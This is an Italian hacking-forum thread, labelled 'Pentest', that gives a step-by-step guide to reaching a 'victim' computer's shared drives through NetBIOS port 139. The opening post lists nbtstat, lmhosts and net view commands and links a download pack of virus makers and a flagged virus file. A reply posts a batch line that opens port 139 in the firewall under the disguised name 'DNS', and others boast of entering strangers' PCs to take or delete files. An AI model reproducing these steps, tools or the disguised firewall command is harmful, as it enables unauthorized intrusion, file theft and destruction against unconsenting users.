Pentest Entrare in un computer tramite la porta 139

Stato
Discussione chiusa ad ulteriori risposte.

blackman21

Utente Silver
23 Dicembre 2009
26
9
0
60
ecco a voi una piccola guida per l'accesso al HDD (hard disk divre) di un computer.
passo 1 scaricate questo pack basic program wirles hacking blackman21.rar
contiene:
-R3x (scanner x ip)
-Necro virus maker (serve per creare virus ma noi lo useremo per sannerizzare gli ip e vedere le porte aperte)
-apri porta 139.bat (piccolo bat che apre la porta 139 del netbios)
-port scanner by thecold (scannerizza le porte ma non è il massimo e a volte [spesso] sbaglia).

e ora iniziamo.

1-aprite il programmino
2-su scan from scrivete un ip con 1 per ultima cifra (es. 87.7.65.1) e premete il tasto 1..254
3-cliccate scan
4-troverete degli ip
5-lasciate il programmino così e fate start-->esegui--->cmd
6-scrivete "cd C:\Windows"
7-ora scrivete "Nbtstat -A “ip della vittima”" (la vittima deve avere la porta 139 aperta)
8-compare una tabbella e prendete nota dell'ip della vittima
9-scrivete "Edit C:windowslmhosts"
10-scrivete: “IP”"NOME DELL’IP DELLA VITTIMA”#PRE
11-file-->salva e poi uscite (file-->esci)
12-scrivete "Nbtstat -R"
13-scrivete "Net View ”NOME DELL’IP DELLA VITTIMA”"
14-Ora basta andare in Risorse di Rete -> Strumenti -> Connetti ad unità di rete e inserite come nome dell’unità rete: ”NOME DELL’IP DELLA VITTIMA”C
L’unità C è condivisa nel vostro PC.
fonte WEB
nota:
il .rar contiene altri files tra cui:
-Scan netbios (discreto scanner di ip)
-Matrix virus maker (per creare virus)
-Genesis.exe.bat (NON TOCCARE VIRUS!!)
-varie .ddl che servono per fare girare i programmi.
 
Non male come guida....ma....:

I FILE NON VANNO!!! Il mio pc (senza antivirus ovvio) li rileva danneggiati o una parte mancante e non si aprono....Sbaglio io o cosa?!
 
Ale mi hai rubato l'avatar
??? Veramente io ho cercato in google immagini, c++ e l'ho trovata... :)

Black, non riesco...tu riesci?? Se faccio 1 video mentre provo, mi dici dove sbaglio?
 
comunque sia è una cosa ke si sa da milioni di anni. Penza ke Adamo si metteva ad hackerare il pc di Eva ke poi si incassava e gli buttava le mele addosso :asd:
basta un ke chiudi la porta 139. se poi ti serve ci metti un firewall...
 
Cioè?? Non penso possa essere del tutto diverso il metodo.... al massimo, basta che (come faccio io), fai:

start>esegui>"\\numeroip"

Ed è gia fatto.... Mi potreste dare il codice batch per aprire la porta 139? Ne ho provati un po', ma non vanno.... Grazie ;)
 
Cioè?? Non penso possa essere del tutto diverso il metodo.... al massimo, basta che (come faccio io), fai:

start>esegui>"\\numeroip"

Ed è gia fatto.... Mi potreste dare il codice batch per aprire la porta 139? Ne ho provati un po', ma non vanno.... Grazie ;)
Echo Off
netsh firewall add portopening protocol = ALL port = 139 name = DNS mode = ENABLE scope = ALL profile = ALL
 
lol entravo nei pc a 9 anni usando la porta 139..ma dai è un pò ridicolo....ke poi nn entri cioè nn vedi la skermata ma solo le cartelle condivise...
 
sono entrato in parecchi pc con questo metodo ovviamente non preso da qui, ma non entri nel pc ma bensi in un percorso che puo essere una cartella o qualche file ma non in tutto il pc, puoi cancellare e prendere i file che vuoi
 
Stato
Discussione chiusa ad ulteriori risposte.